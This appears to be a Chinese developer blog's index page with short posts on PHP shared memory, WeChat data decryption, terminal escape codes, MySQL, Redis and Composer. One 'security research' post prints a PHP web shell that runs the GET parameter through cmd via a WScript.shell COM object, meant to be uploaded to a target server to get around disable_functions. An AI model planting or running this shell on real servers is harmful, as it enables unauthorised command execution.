e攻城狮

使用 PHP 直接在共享内存中存储数据集转

发表于 2019-11-04 分类于 PHP

概述

共享内存是一种在相同机器中的应用程序之间交换数据的有效方式。一个进程可创建一个可供其他进程访问的内存段，只要它分配了正确的权限。每个内存段拥有一个惟一的 ID（称为 shmid），这个 ID 指向一个物理内存区域，其他进程可在该区域操作它。创建并提供了合适的权限之后，同一台机器中的其他进程就可以操作这些内存段：读取、写入和删除。

这表明使用 C 语言编写的应用程序可与使用其他语言（比如 Java™ 或 PHP）编写的应用程序共享信息。它们都可以共享信息，只要它们可访问和理解该信息。共享内存在针对大部分语言的实现中得到了广泛使用，所以访问应该不是问题。要理解信息，我们可以使用一种标准格式，比如 XML 或 JSON。

共享内存的使用是一种在进程之间交换数据的快速方法，主要因为在创建内存段之后传递数据，不会涉及内核。这种方法常常称为进程间通信 (IPC)。其他 IPC 方法包括管道、消息队列、RPC 和套接字。当使用需要彼此通信的应用程序的生态系统时，这种在应用程序之间快速、可靠地交换数据的能力非常有用。取决于生态系统的大小，使用数据库在应用程序之间交换信息的常用方法常常会导致查询缓慢，甚至 I/O 阻塞。使用共享内存，没有 I/O 会减缓开发人员的进度。

本文的提议非常简单，学习如何使用 PHP 创建和操作共享内存段，使用它们存储可供其他应用程序使用的数据集。即使没有使用共享内存交换数据的计划，它本身也在许多好处，因为它使应用程序能够远离 I/O 问题。将数据集直接存储在内存中具有诸多优势，从 Web 服务数据缓存到会话共享。它是一个非常有用的概念，每个 PHP 开发人员都应该知道。

共享内存和 PHP

PHP 拥有丰富的可用扩展，共享内存也一样。使用一些共享的函数，无需安装任何扩展，开发人员就能够轻松操作内存段。

创建内存段

共享内存函数类似于文件操作函数，但无需处理一个流，您将处理一个共享内存访问 ID。第一个示例就是 shmop_open 函数，它允许您打开一个现有的内存段或创建一个新内存段。此函数非常类似于经典的 fopen 函数，后者打开用于文件操作的流，返回一个资源供其他希望读取或写入该打开的流的函数使用。让我们看看清单 1 中的 shmop_open。

清单 1. shmop_open 函数

<?php

// $systemid = ftok(__FILE__,'t'); // System ID for the shared memory segment
$systemid = 864; // System ID for the shared memory segment
$mode = "c"; // Access mode
$permissions = 0755; // Permissions for the shared memory segment
$size = 1024; // Size, in bytes, of the segment

$shmid = shmop_open($systemid, $mode, $permissions, $size);

?>

该函数中出现的第一个事物是系统 ID 参数。这是标识系统中的共享内存段的数字。第二个参数是访问模式，它非常类似于 fopen 函数的访问模式。您可以在 4 种不同的模式下访问一个内存段：

模式 “a”，它允许您访问只读内存段
模式 “w”，它允许您访问可读写的内存段
模式 “c”，它创建一个新内存段，或者如果该内存段已存在，尝试打开它进行读写
模式 “n”，它创建一个新内存段，如果该内存段已存在，则会失败
第三个参数是内存段的权限。您必须在这里提供一个八进制值。

第四个参数提供内存段大小，以字节为单位。在写入一个内存段之前，您必须在它之上分配适当的字节数。

请注意，此函数返回一个 ID 编号，其他函数可使用该 ID 编号操作该共享内存段。这个 ID 是共享内存访问 ID，与系统 ID 不同，它以参数的形式传递。请注意不要混淆这两者。如果失败，shmop_open 将返回 FALSE。

向内存段写入数据

使用 shmop_write 函数向共享内存块写入数据。此函数的使用很简单，它仅接受 3 个参数，如清单 2 所示。

清单 2. 使用 shmop_write 向共享内存块写入数据

<?php

$shmid = shmop_open(864, 'c', 0755, 1024);
shmop_write($shmid, "Hello World!", 0);

?>

这个函数类似于 fwrite 函数，后者有两个参数：打开的流资源（由 fopen 返回）和您希望写入的数据。shmop_write 函数也执行此任务。

第一个参数是 shmop_open 返回的 ID，它识别您操作的共享内存块。第二个参数是您希望存储的数据，最后的第三个参数是您希望开始写入的位置。默认情况下，我们始终使用 0 来表示开始写入的位置。请注意，此函数在失败时会返回 FALSE，在成功时会返回写入的字节数。

从内存段读取数据

从共享内存段读取数据很简单。您只需要一个打开的内存段和 shmop_read 函数。此函数接受一些参数，工作原理类似于 fread。参见清单 3，读取一个 PHP 文件的内容。

清单 3. 使用 shmop_read 读取一个文件的内容

<?php

$stream = fopen('file.txt', 'r+');
fwrite($stream, "Hello World!");
echo fread($stream, 11);

?>

读取共享内存段的内容的过程与此类似，如清单 4 所示：

清单 4. 读取共享内存段的内容

<?php

$shmid = shmop_open(864, 'c', 0755, 1024);
shmop_write($shmid, "Hello World!", 0);
echo shmop_read($shmid, 0, 11);

?>

请留意这里的参数。shmop_read 函数将接受 shmop_open 返回的 ID，我们已知道它，不过它还接受另外两个参数。第二个参数是您希望从内存段读取的位置，而第三个是您希望读取的字节数。第二个参数可以始终为 0，表示数据的开头，但第三个参数可能存在问题，因为我们不知道我们希望读取多少字节。

这非常类似于我们在 fread 函数中的行为，该函数接受两个参数：打开的流资源（由 fopen 返回）和您希望从该流读取的字节数。使用 filesize 函数（它返回一个文件中的字节数）来完整地读取它。

幸运的是，当使用共享内存段时，shmop_size 函数返回一个内存段的大小（以字节为单位），类似于 filesize 函数。参见清单 5。

清单 5. shmop_size 函数返回内存段大小，以字节为单位

<?php

$shmid = shmop_open(864, 'c', 0755, 1024);
shmop_write($shmid, "Hello World!", 0);

$size = shmop_size($shmid);
echo shmop_read($shmid, 0, $size);

?>

删除内存段

我们学习了如何打开、写入和读取共享内存段。要完成我们的 CRUD 类，我们还需要学习如何删除内存段。该任务可使用 shmop_delete 函数轻松完成，该函数仅接受一个参数：我们希望删除的共享内存 ID。

清单 6. shmop_delete 标记要删除的内存段

<?php

$shmid = shmop_open(864, 'c', 0755, 1024);
shmop_write($shmid, "Hello World!", 0);
shmop_delete($shmid);

?>

这不会实际删除该内存段：它将该内存段标记为删除，因为共享内存段在有其他进程正在使用它时无法被删除。shmop_delete 函数将该内存段标记为删除，阻止任何其他进程打开它。要删除它，我们需要关闭该内存段。

关闭内存段

打开一个共享内存段会 “附加” 到它。附加该内存段之后，我们可在其中进行读取和写入，但完成操作后，我们必须从它解除。这使用清单 7 中的 shmop_close 函数来完成。

这非常类似于处理文件时的 fclose 函数。打开包含一个文件的流并在其中读取或写入数据后，我们必须关闭它，否则将发生锁定。

清单 7. 使用 shmop_close 与一个内存段分开

<?php

$shmid = shmop_open(864, 'c', 0755, 1024);
shmop_write($shmid, "Hello World!", 0);
shmop_delete($shmid);
shmop_close($shmid);

?>

使用共享内存作为一个存储选项

有了共享内存和共享内存段上基本 CRUD 操作的基本知识，是时候应用此知识了。我们可以使用共享内存作为一种独特的存储选项，提供快速读/写操作和进程互操作性等优势。对于 Web 应用程序，这意味着：

缓存存储（数据库查询、Web 服务数据、外部数据）
会话存储
应用程序之间的数据交换

在继续之前，我想介绍一个名为 SimpleSHM 小型库。SimpleSHM 是一个较小的抽象层，用于使用 PHP 操作共享内存，支持以一种面向对象的方式轻松操作内存段。在编写使用共享内存进行存储的小型应用程序时，这个库可帮助创建非常简洁的代码。要了解 SimpleSHM，请访问 GitHub 页面。

您可以使用 3 个方法进行处理：读、写和删除。从该类中简单地实例化一个对象，可以控制打开的共享内存段。清单 8 展示了基本用途。

清单 8. SimpleSHM 基本用途

<?php

$memory = new SimpleSHM;
$memory->write('Sample');
echo $memory->read();

?>

请注意，这里没有为该类传递一个 ID。如果没有传递 ID，它将随机选择一个编号并打开该编号的新内存段。我们可以以参数的形式传递一个编号，供构造函数打开现有的内存段，或者创建一个具有特定 ID 的内存段，如清单 9 所示。

清单 9. 打开一个特定的内存段

<?php

$new = new SimpleSHM(897);
$new->write('Sample');
echo $new->read();

?>

__destructor 负责在该内存段上调用 shmop_close 来取消设置对象，以与该内存段分离。我们将这称为 “SimpleSHM 101”。现在让我们将此方法用于更高级的用途：使用共享内存作为存储。存储数据集需要序列化，因为数组或对象无法存储在内存中。尽管这里使用了 JSON 来序列化，但任何其他方法（比如 XML 或内置的 PHP 序列化功能）也已足够。清单 10 给出了一个示例。

清单 10. 使用共享内存作为存储

<?php

require('SimpleSHM.class.php');

$results = array(
    'user' => 'John',
    'password' => '123456',
    'posts' => array('My name is John', 'My name is not John')
);

$data = json_encode($results);

$memory = new SimpleSHM;
$memory->write($data);
$storedarray = json_decode($memory->read());

print_r($storedarray);

?>

我们成功地将一个数组序列化为一个 JSON 字符串，将它存储在共享内存块中，从中读取数据，去序列化 JSON 字符串，并显示存储的数组。这看起来很简单，但请想象一下这个代码片段带来的可能性。您可以使用它存储 Web 服务请求、数据库查询或者甚至模板引擎缓存的结果。在内存中读取和写入将带来比在磁盘中读取和写入更高的性能。

使用此存储技术不仅对缓存有用，也对应用程序之间的数据交换也有用，只要数据以两端都可读的格式存储。不要低估共享内存在 Web 应用程序中的力量。可采用许多不同的方式来巧妙地实现这种存储，惟一的限制是开发人员的创造力和技能。

结束语

本文介绍了用于操作共享内存段的 PHP 工具包中的大部分工具，解释了共享内存的工作原理。此外，还提供了改进 Web 应用程序的建议，列出了在为 Web 应用程序问题创建解决方案时要考虑的一些因素。这些概念和实现指南可帮助您建立一个起点。我们构建的早期模型可帮助您构想更复杂的特性和解决方案。

未来计划

我们列出了共享内存中最可能实现的一些常见问题，比如缓存、会话共享和应用程序之间的常见数据交换。此篇共享内存简介为您就常见问题而探索更佳解决方案提供机会。您可以自由扩展当前的 SimpleSHM 实现，以匹配您的需要和将更改贡献给该项目。

注意：windows环境下，上面清单方法需要在php_shmop.dll开启的环境下才可运行。其中ftok方法实现:

// 将路径名和项目标识符转换为System V IPC 密钥
if (!function_exists('ftok')) {
    function ftok($filename = "", $proj = "")
    {
        if (empty($filename) || !file_exists($filename)) {
            return -1;
        } else {
            $filename = $filename . (string)$proj;
            for ($key = array(); sizeof($key) < strlen($filename); $key[] = ord(substr($filename, sizeof($key), 1))) ;
            return dechex(array_sum($key));
        }
    }
}

微信小程序敏感信息解密代码中Mcrypt被PHP7.1废弃的解决方案

发表于 2019-08-20 分类于 PHP

一、问题

微信小程序开发的加解密demo代码中，使用了 Mcrypt ，而mcrypt在php7.1已经算是被废弃了。强制使用将会出现如下问题:

{
    "message":"Function mcrypt_module_open() is deprecated",
    "status_code":500
}

二、解决

主要是在 Prpcrypt 这个类里面中使用的代码

之前的代码：

/**
    * 对密文进行解密
    * @param string $aesCipher 需要解密的密文
    * @param string $aesIV 解密的初始向量
    * @return array 解密得到的明文
*/
public function decrypt($aesCipher, $aesIV)
{
    try {

        $module = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');// 此处php < 7.1 支持

        mcrypt_generic_init($module, $this->key, $aesIV);

        //解密
        $decrypted = mdecrypt_generic($module, $aesCipher);
        mcrypt_generic_deinit($module);
        mcrypt_module_close($module);
    } catch (Exception $e) {
        return array(ErrorCode::$IllegalBuffer, null);
    }
}

修改之后的代码：


/**
* 对密文进行解密
* @param string $aesCipher 需要解密的密文
* @param string $aesIV 解密的初始向量
* @return array 解密得到的明文
*/
public function decrypt($aesCipher, $aesIV)
{
    try {
        //解密
        $decrypted = openssl_decrypt($aesCipher, 'aes-128-cbc', $this->key, OPENSSL_RAW_DATA, $aesIV);
    } catch (\Exception $e) {
        return [ErrorCode::$IllegalBuffer, null];
    }
    try {
        //去除补位字符
        $pkc_encoder = new PKCS7Encoder;
        $result = $pkc_encoder->decode($decrypted);
    } catch (\Exception $e) {
        return [ErrorCode::$IllegalBuffer, null];
    }
    return [0, $result];
}

三、注意

需要安装openssl扩展！！

四、DEMO

<?php
namespace App\Extend;


class WxDataDecrypt
{
    private $appid;
    private $sessionKey;

    /**
     * 构造函数
     * @param $sessionKey string 用户在小程序登录后获取的会话密钥
     * @param $appId string 小程序的appId
     */
    public function __construct($appid, $sessionKey)
    {
        $this->sessionKey = $sessionKey;
        $this->appid = $appid;
    }

    /**
     * 检验数据的真实性，并且获取解密后的明文.
     * @param $encryptedData string 加密的用户数据
     * @param $iv string 与用户数据一同返回的初始向量
     * @param $data string 解密后的原文
     *
     * @return int 成功0，失败返回对应的错误码
     */
    public function decryptData($encryptedData, $iv, &$data)
    {
        if (strlen($this->sessionKey) != 24) {
            return ErrorCode::$IllegalAesKey;
        }
        $aesKey = base64_decode($this->sessionKey);

        if (strlen($iv) != 24) {
            return ErrorCode::$IllegalIv;
        }
        $aesIV = base64_decode($iv);

        $aesCipher = base64_decode($encryptedData);

        $pc = new Prpcrypt($aesKey);
        $result = $pc->decrypt($aesCipher, $aesIV);

        if ($result[0] != 0) {
            return $result[0];
        }

        $dataObj = json_decode($result[1]);
        if ($dataObj == NULL) {
            return ErrorCode::$IllegalBuffer;
        }
        if ($dataObj->watermark->appid != $this->appid) {
            return ErrorCode::$IllegalBuffer;
        }
        $data = $result[1];
        return ErrorCode::$OK;
    }

}


/**
 * PKCS7Encoder class
 *
 * 提供基于PKCS7算法的加解密接口.
 */
class PKCS7Encoder
{
    public static $block_size = 32;

    /**
     * 对需要加密的明文进行填充补位
     * @param string $text 需要进行填充补位操作的明文
     * @return string 补齐明文字符串
     */
    function encode($text)
    {
        $block_size = self::$block_size;
        $text_length = strlen($text);
        //计算需要填充的位数
        $amount_to_pad = $block_size - ($text_length % $block_size);
        if ($amount_to_pad == 0)
            $amount_to_pad = $block_size;
        //获得补位所用的字符
        $pad_chr = chr($amount_to_pad);
        $tmp = "";
        for ($index = 0; $index < $amount_to_pad; $index++)
            $tmp .= $pad_chr;
        return $text . $tmp;
    }


    /**
     * 对解密后的明文进行补位删除
     * @param string $text 解密后的明文
     * @return string 删除填充补位后的明文
     */
    function decode($text)
    {
        $pad = ord(substr($text, -1));
        if ($pad < 1 || $pad > self::$block_size)
            $pad = 0;
        return substr($text, 0, (strlen($text) - $pad));
    }
}

/**
 * Prpcrypt class
 *
 *
 */
class Prpcrypt
{
    public $key;

    function __construct($key)
    {
        $this->key = $key;
    }

    /**
     * 对密文进行解密
     * @param string $aesCipher 需要解密的密文
     * @param string $aesIV 解密的初始向量
     * @return array 解密得到的明文
     */
    public function decrypt($aesCipher, $aesIV)
    {
        try {
            //解密
            $decrypted = openssl_decrypt($aesCipher, 'aes-128-cbc', $this->key, OPENSSL_RAW_DATA, $aesIV);
        } catch (\Exception $e) {
            return [ErrorCode::$IllegalBuffer, null];
        }
        try {
            //去除补位字符
            $pkc_encoder = new PKCS7Encoder;
            $result = $pkc_encoder->decode($decrypted);
        } catch (\Exception $e) {
            return [ErrorCode::$IllegalBuffer, null];
        }
        return [0, $result];
    }
}


/**
 * error code 说明.
 * <ul>
 *    <li>-41001: encodingAesKey 非法</li>
 *    <li>-41003: aes 解密失败</li>
 *    <li>-41004: 解密后得到的buffer非法</li>
 *    <li>-41005: base64加密失败</li>
 *    <li>-41016: base64解密失败</li>
 * </ul>
 */
class ErrorCode
{
    public static $OK = 0;
    public static $IllegalAesKey = -41001;
    public static $IllegalIv = -41002;
    public static $IllegalBuffer = -41003;
    public static $DecodeBase64Error = -41004;
    public static $DecryptAESError = -41005;
    public static $ValidateAppidError = -41006;
    public static $ErrorMsg = [
        0 => 'ok',
        -41001 => 'aes 解密失败',
        -41002 => '解密后得到的buffer非法',
        -41003 => 'base64加密失败',
        -41004 => 'base64解密失败'
    ];
}

// 获取手机号
$tool = new WxDataDecrypt(ENV('WX_APPID'), $arr['_session_key']);
$error = $tool->decryptData($arr['encryptedData'], $arr['iv'], $decryptRet);
if ($error) {
    echo ErrorCode::$ErrorMsg[$error] ?? '未知错误';
} else {
    $decryptRet = json_decode($decryptRet, true);
    $tel_phone = $decryptRet['purePhoneNumber'];
    echo "phone: {$tel_phone}";
}
?>

五、简化

上面的代码比较复杂，那就看下面的代码吧, 调用方法完全一致。

<?php

class WxDataDecrypt
{
    private $appid;
    private $sessionKey;

    /**
     * error code 说明.
     * <ul>
     *    <li>-41001: encodingAesKey 非法</li>
     *    <li>-41003: aes 解密失败</li>
     *    <li>-41004: 解密后得到的buffer非法</li>
     *    <li>-41005: base64加密失败</li>
     *    <li>-41016: base64解密失败</li>
     * </ul>
     */
    public static $OK = 0;
    public static $IllegalAesKey = -41001;
    public static $IllegalIv = -41002;
    public static $IllegalBuffer = -41003;
    public static $DecodeBase64Error = -41004;
    public static $ErrorMsg = [
        0 => 'ok',
        -41001 => 'aes 解密失败',
        -41002 => '解密后得到的buffer非法',
        -41003 => 'base64加密失败',
        -41004 => 'base64解密失败'
    ];

    /**
     * 构造函数
     * @param $sessionKey string 用户在小程序登录后获取的会话密钥
     * @param $appid string 小程序的appid
     */
    public function __construct($appid, $sessionKey)
    {
        $this->appid = $appid;
        $this->sessionKey = $sessionKey;
    }

    /**
     * 检验数据的真实性，并且获取解密后的明文.
     * @param $encryptedData string 加密的用户数据
     * @param $iv string 与用户数据一同返回的初始向量
     * @param $data string 解密后的原文
     *
     * @return int 成功0，失败返回对应的错误码
     */
    public function decryptData($encryptedData, $iv, &$data)
    {
        if (strlen($this->sessionKey) != 24) {
            return self::$IllegalAesKey;
        }
        $aesKey = base64_decode($this->sessionKey);

        if (strlen($iv) != 24) {
            return self::$IllegalIv;
        }
        $aesIV = base64_decode($iv);

        $aesCipher = base64_decode($encryptedData);

        $result = openssl_decrypt($aesCipher, "AES-128-CBC", $aesKey, OPENSSL_RAW_DATA, $aesIV);

        $dataObj = json_decode($result);
        if ($dataObj == NULL) {
            return self::$IllegalBuffer;
        }
        if ($dataObj->watermark->appid != $this->appid) {
            return self::$IllegalBuffer;
        }
        $data = $result;
        return self::$OK;
    }
}

超级终端玩法

发表于 2019-07-24

颜色特效控制：

1	printf("\033[1;33m Hello World. \033[0m \n");

颜色如下:

none         = "\033[0m"

black        = "\033[0;30m"

dark_gray    = "\033[1;30m"

blue         = "\033[0;34m"

light_blue   = "\033[1;34m"

green        = "\033[0;32m"

light_green -= "\033[1;32m"

cyan         = "\033[0;36m"

light_cyan   = "\033[1;36m"

red          = "\033[0;31m"

light_red    = "\033[1;31m"

purple       = "\033[0;35m"

light_purple = "\033[1;35m"

brown        = "\033[0;33m"

yellow       = "\033[1;33m"

light_gray   = "\033[0;37m"

white        = "\033[1;37m"

字背景颜色范围:

40--49                   字颜色: 30--39

40: 黑                          30: 黑

41:红                          31: 红

42:绿                          32: 绿

43:黄                          33: 黄

44:蓝                          34: 蓝

45:紫                          35: 紫

46:深绿                        36: 深绿

47:白色                        37: 白色

输出特效格式控制：

\033[0m  关闭所有属性

\033[1m   设置高亮度

\03[4m   下划线

\033[5m   闪烁

\033[7m   反显

\033[8m   消隐

\033[30m   --   \033[37m   设置前景色

\033[40m   --   \033[47m   设置背景色

光标位置等的格式控制：

\033[nA  光标上移n行

\03[nB   光标下移n行

\033[nC   光标右移n行

\033[nD   光标左移n行

\033[y;xH设置光标位置

\033[2J   清屏

\033[K   清除从光标到行尾的内容

\033[s   保存光标位置

\033[u   恢复光标位置

\033[?25l   隐藏光标

\33[?25h   显示光标

DEMO

<?php
foreach (["{chr}foo_bar", "foo{chr}bar", "foo_bar{chr}"] as $k => $arg) {
    for ($i = 0; $i <= 255; $i++) {
        echo "\33[999D\33[K\r";
        echo "[" . $arg . "] check " . bin2hex(chr($i)) . "";
        parse_str(str_replace("{chr}", chr($i), $arg) . "=bla", $o);
        usleep(5000);
        if (isset($o["foo_bar"])) {
            echo "\33[999D\33[K\r";
            echo $arg . " -> " . bin2hex(chr($i)) . " (" . chr($i) . ")\n";
        }
    }
    echo "\33[999D\33[K\r";
    echo "\n";
}

QQ空间Api

发表于 2019-06-27

PHP独特的正则表达式

发表于 2019-06-21 分类于 PHP

code:

1 2	// php 7.2.16 var_dump(preg_match("/^[a-z]+$/", "abc\n")); // true

1 2	// javascript console.log("/^[a-z]+$/".test("abc\n")); // false

1 2	// java(jdk11) System.out.println(Pattern.matches("^[a-z]+$", "abc\n")); // false

Php使用的是 Perl特性的匹配规则，所以要想达到下面的效果需要在使用

/^[a-z]+$/n 或 /(*CRLF)^[a-z]+$/

php文档中关于此段的解释 https://www.php.net/manual/en/reference.pcre.pattern.modifiers.php

“Because Perl returns a string with a newline at the end when reading a line from a file, Perl’s regex engine matches $ at the position before the line break at the end of the string even when multi-line mode is turned off. Perl also matches $ at the very end of the string, regardless of whether that character is a line break. So ^\d+$ matches 123 whether the subject string is 123 or 123\n.”

“D (PCRE_DOLLAR_ENDONLY)

If this modifier is set, a dollar metacharacter in the pattern matches only at the end of the subject string. Without this modifier, a dollar also matches immediately before the final character if it is a newline (but not before any other newlines). This modifier is ignored if m modifier is set. There is no equivalent to this modifier in Perl.”

WindowsCom组件绕过disable_function的方法转

发表于 2019-06-03 分类于安全研究

window com组件(php 5.4)(高版本扩展要自己添加）

条件：要在php.ini中开启（如图）

利用代码，利用shell上传如下代码到目标服务器上

<?php

$command=$_GET['a'];

$wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能

$exec = $wsh->exec("cmd /c ".$command); // 调用对象方法来执行命令

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

利用成功后的结果

QQ如何实现跨端通信的

发表于 2019-05-24

前言

这个问题之前很好解决，使用浏览器 plugin 即可。

但是随着 Chrome 和 Firefox 都先后放弃了 NPAPI plugin，这一方法也行不通了，而且很多人是很讨厌 plugin 的。

但是在默认禁止了 NPAPI 的 Chrome 版本，QQ 依然可以实现快速登录（一键登录），是怎么做到的呢？

原理

其实不难猜。既然不存在 plugin，无法以此来实现浏览器内和本地客户端的直接通信，那么排除其他的黑科技，有一种很简单的方法可以实现这个效果。

那就是在客户端开一个 Server，在浏览器里面请求这个地址。

理论上这样是可以实现的，至于 QQ 是不是用的这种方法，稍微验证下好了。

验证

找一个有 QQ 快速登陆的页面，比如 mail.qq.com登陆 QQ 客户端打开浏览器的 Developer Tools -> Network 刷新页面，观察所有请求的 domain。很明显，我们要找的完整请求 url 是这样的

https://localhost.ptlogin2.qq.com:4301/pt_get_uins?callback=ptui_getuins_CB&r=0.125114&pt_local_tk=-2004781

看看这个请求的 Response Content

var var_sso_uin_list=[
    {
        "account":"xxxxxx",
        "client_type":65793,
        "face_index":0,
        "gender":1,
        "nickname":"xxx",
        "uin":"xxx",
        "uin_flag":xxxxx
    }
];
ptui_getuins_CB(var_sso_uin_list);

很明显是当前登录的用户信息, ping 一下这个请求的 domain, 不出所料结果是 127.0.0.1

1
2
3

ping localhost.ptlogin2.qq.com

// Pinging localhost.ptlogin2.qq.com [127.0.0.1] with 32 bytes of data

现在我们验证下是否是 QQ 开了这个 Server

查看哪个程序占用了 4301 端口

1
2
3

netstat -ano | findstr "4301"

// TCP    127.0.0.1:4301   0.0.0.0:0   LISTENING   4152

得到 pid 我们就可以看否是 QQ 在监听这个端口了

1
2
3

tasklist | findstr "4152"

// QQ.exe  4152 Console   1    178,616 K

可能有人担心会不会有安全问题，会不会其他网站访问这个 url 就拿走用户信息？其实挺容易解决，存一个 token 到服务器端，获取的时候校验下就好了。

但是归根到底取决于腾讯对这方面安全的重视程度和意愿了，至少之前是确实存在从网页上获取当前登录的 QQ 信息的方法，虽然问题不是出在快速登录这部分。

模拟

接下来我用GOLang模拟这种技术实现


package main

import (
    "fmt" 
    "log" 
    "io" 
    "net" 
    "net/http"
	"encoding/json"
)


type Data struct{
    Ip string
	Mac string
}
type Ret struct{
	Code int 
	Msg string
	Data Data
}  

func getMacAddrs() (macAddrs []string) {
    netInterfaces, err := net.Interfaces()
    if err != nil {
        fmt.Printf("fail to get net interfaces: %v", err)
        return macAddrs
    }

    for _, netInterface := range netInterfaces {
        macAddr := netInterface.HardwareAddr.String()
        if len(macAddr) == 0 {
            continue
        }

        macAddrs = append(macAddrs, macAddr)
    }
    return macAddrs
}

func getIPs() (ips []string) {

    interfaceAddr, err := net.InterfaceAddrs()
    if err != nil {
        fmt.Printf("fail to get net interface addrs: %v", err)
        return ips
    }

    for _, address := range interfaceAddr {
        ipNet, isValidIpNet := address.(*net.IPNet)
        if isValidIpNet && !ipNet.IP.IsLoopback() {
            if ipNet.IP.To4() != nil {
                ips = append(ips, ipNet.IP.String())
            }
        }
    }
    return ips
}

func handleToken(w http.ResponseWriter, r *http.Request) {  

    log.Fatal("Request: ", r)

    data := Data{Ip: getIPs()[0], Mac: getMacAddrs()[0]}
 
	ret := new(Ret) 
 
	ret.Code = 0 
	ret.Msg = "success"
	ret.Data = data
	ret_json,_ := json.Marshal(ret)
	w.Header().Set("Content-Type","text/json;charset=utf-8")
	io.WriteString(w, string(ret_json))
}

func main() { 
   http.HandleFunc("/token", handleToken)
   err := http.ListenAndServe("localhost.ya2.top:1024", nil) 
   if err != nil {
		log.Fatal("ListenAndServe: ", err)
   }
}

其中域名 localhost.ya2.top 配置指向解析记录：127.0.0.1

测试效果:

搞定，这只是一个简单的DEMO，但是了解原理已经足够了。欢迎大佬指正~

mysql表字段信息查询

发表于 2019-05-20 分类于数据库

新建表以及添加表和字段的注释

create table t_user(

    ID INT(19) primary key auto_increment  comment '主键',

    NAME VARCHAR(300) comment '姓名',

    CREATE_TIME date comment '创建时间'

) comment  = '用户信息表';

修改表/字段的注释

1
2
3

alter table t_user comment  = '修改后的表注释信息(用户信息表)'

alter table t_user modify column id int comment '主键ID';

–注意：字段名和字段类型照写就行

查询数据库所有表的详细信息(包括表的注释)

1
2
3

use information_schema;

select * from TABLES where TABLE_SCHEMA='my_db';

–查询某一张表的

1
2
3

use information_schema;

select * from TABLES where TABLE_SCHEMA='my_db' and TABLE_NAME= 'auth_user';

查询一张表的详细信息(包括字段注释,字段名称,类型等)

1
2
3

use information_schema;

select * from information_schema.columns where table_schema ='my_db'  and table_name = 'auth_user';

注:还有一种方式:

show create table table_name;

use my_db;

show full columns from auth_user;

Redis实现批量删除

发表于 2019-05-08 分类于数据库

redis-cli -h 主机地址 -a 鉴权 -n 0 -p 6379 –scan –pattern “正则表达式” | xargs -L 5000 redis-cli -h 主机地址 -a 鉴权-n 0 -p 6379 DEL

Composer教程

发表于 2019-04-26 分类于 PHP

安装

下载composer安装器

1	php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"

校验安装包是否正确(可选，以v1.9.3为例)

php -r "if (hash_file('sha384', 'composer-setup.php') === 'e0012edf3e80b6978849f5eff0d4b4e4c79ff1609dd1e613307e16318854d24ae64f26d17af3ef0bf7cfb710ca74755a') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;"

注意hash值有版本差异

安装composer

1	php composer-setup.php --install-dir=bin

卸载安装包(可选)

1	php -r "unlink('composer-setup.php');"

windows系统中使用composer命令(可选)

新建 composer.bat 文件，内容为 @php “%~dp0composer.phar” %*
环境变量中添加composer.bat文件路径

国内镜像切换(可选)

1	composer config -g repo.packagist composer https://mirrors.aliyun.com/composer/

更多参考 https://getcomposer.org/download/

使用

常用命令

install 命令

要使用 Composer，我们需要先在项目的目录下创建一个 composer.json 文件，文件描述了项目的依赖关系。

文件格式如下：

{
    "require": {
        "monolog/monolog": "1.2.*"
    }
}

以上文件说明我们需要下载从 1.2 开始的任何版本的 monolog。

接下来只要运行以下命令即可安装依赖包：如何发布包？

composer install

require 命令

除了使用 install 命令外，我们也可以使用 require 命令快速的安装一个依赖而不需要手动在 composer.json 里添加依赖信息：

1	$ composer require monolog/monolog

Composer 会先找到合适的版本，然后更新composer.json文件，在 require 那添加 monolog/monolog 包的相关信息，再把相关的依赖下载下来进行安装，最后更新 composer.lock 文件并生成 php 的自动加载文件。

update 命令

update 命令用于更新项目里所有的包，或者指定的某些包：

# 更新所有依赖
$ composer update

# 更新指定的包
$ composer update monolog/monolog

# 更新指定的多个包
$ composer update monolog/monolog symfony/dependency-injection

# 还可以通过通配符匹配包
$ composer update monolog/monolog symfony/*

需要注意的时，包能升级的版本会受到版本约束的约束，包不会升级到超出约束的版本的范围。例如如果 composer.json 里包的版本约束为 ^1.10，而最新版本为 2.0。那么 update 命令是不能把包升级到 2.0 版本的，只能最高升级到 1.x 版本。关于版本约束请看后面的介绍。

remove 命令

remove 命令用于移除一个包及其依赖（在依赖没有被其他包使用的情况下），如果依赖被其他包使用，则无法移除：

$ composer remove monolog/monolog
Loading composer repositories with package information
Updating dependencies (including require-dev)
Package operations: 0 installs, 0 updates, 2 removals
  - Removing psr/log (1.0.2)
  - Removing monolog/monolog (1.23.0)
Generating autoload files

search 命令

search 命令可以搜索包：

1	$ composer search monolog

该命令会输出包及其描述信息，如果只想输出包名可以使用 –only-name 参数：

1	$ composer search --only-name monolog

show 命令

show 命令可以列出当前项目使用到包的信息：

# 列出所有已经安装的包
$ composer show

# 可以通过通配符进行筛选
$ composer show monolog/*

# 显示具体某个包的信息
$ composer show monolog/monolog

基本约束

精确版本

我们可以告诉 Composer 安装的具体版本，例如：1.0.2，指定 1.0.2 版本。

范围

通过使用比较操作符来指定包的范围。这些操作符包括：>，>=，<，<=，!=。

你可以定义多个范围，使用空格或者逗号 , 表示逻辑上的与，使用双竖线 || 表示逻辑上的或。其中与的优先级会大于或。实例：

>=1.0
>=1.0 <2.0
>=1.0 <1.1 || >=1.2

我们也可以通过使用连字符 - 来指定版本范围。

连字符的左边表明了 >= 的版本，如果右边的版本不是完整的版本号，则会被使用通配符进行补全。例如 1.0 - 2.0 等同于 >=1.0.0 <2.1 （2.0相当于2.0.*），而1.0.0 - 2.1.0则等同于 >=1.0.0 <=2.1.0。

通配符

可以使用通配符来设置版本。1.0.* 相当于 >=1.0 <1.1。

例子：1.0.*

波浪号 ~

我们先通过后面这个例子去解释 ~ 操作符的用法：~1.2 相当于 >=1.2 <2.0.0，而 ~1.2.3 相当于 >=1.2.3 <1.3.0。对于使用Semantic Versioning作为版本号标准的项目来说，这种版本约束方式很实用。例如 ~1.2 定义了最小的小版本号，然后你可以升级2.0以下的任何版本而不会出问题，因为按照Semantic Versioning的版本定义，小版本的升级不应该有兼容性的问题。简单来说，~ 定义了最小的版本，并且允许版本的最后一位版本号进行升级（没懂得话，请再看一边前面的例子）。

例子：~1.2

